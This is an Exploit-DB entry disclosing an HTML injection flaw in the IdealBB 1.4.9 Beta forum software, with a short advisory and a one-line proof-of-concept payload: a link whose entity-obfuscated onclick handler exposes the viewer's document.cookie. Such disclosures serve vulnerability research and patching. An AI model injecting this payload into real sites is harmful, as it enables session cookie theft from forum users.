IdealBB 1.4.9 Beta - HTML Injection

EDB-ID:

23055

CVE:

N/A

EDB Verified:

Author:

Scott M

Type:

webapps

Exploit: /

Platform:

ASP

Date:

2003-08-23

Vulnerable App:

source: https://www.securityfocus.com/bid/8480/info

IdealBB is prone to an HTML injection vulnerability. This could permit remote attackers to inject malicious HTML and script code into board messages. The attacker's code may be rendered in the web browser of the user viewing the malicious message.

<a href="http://www.google.com" onclick="j&#97;vascript:alert(do&#99;ument.cookie);">Google</a>

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services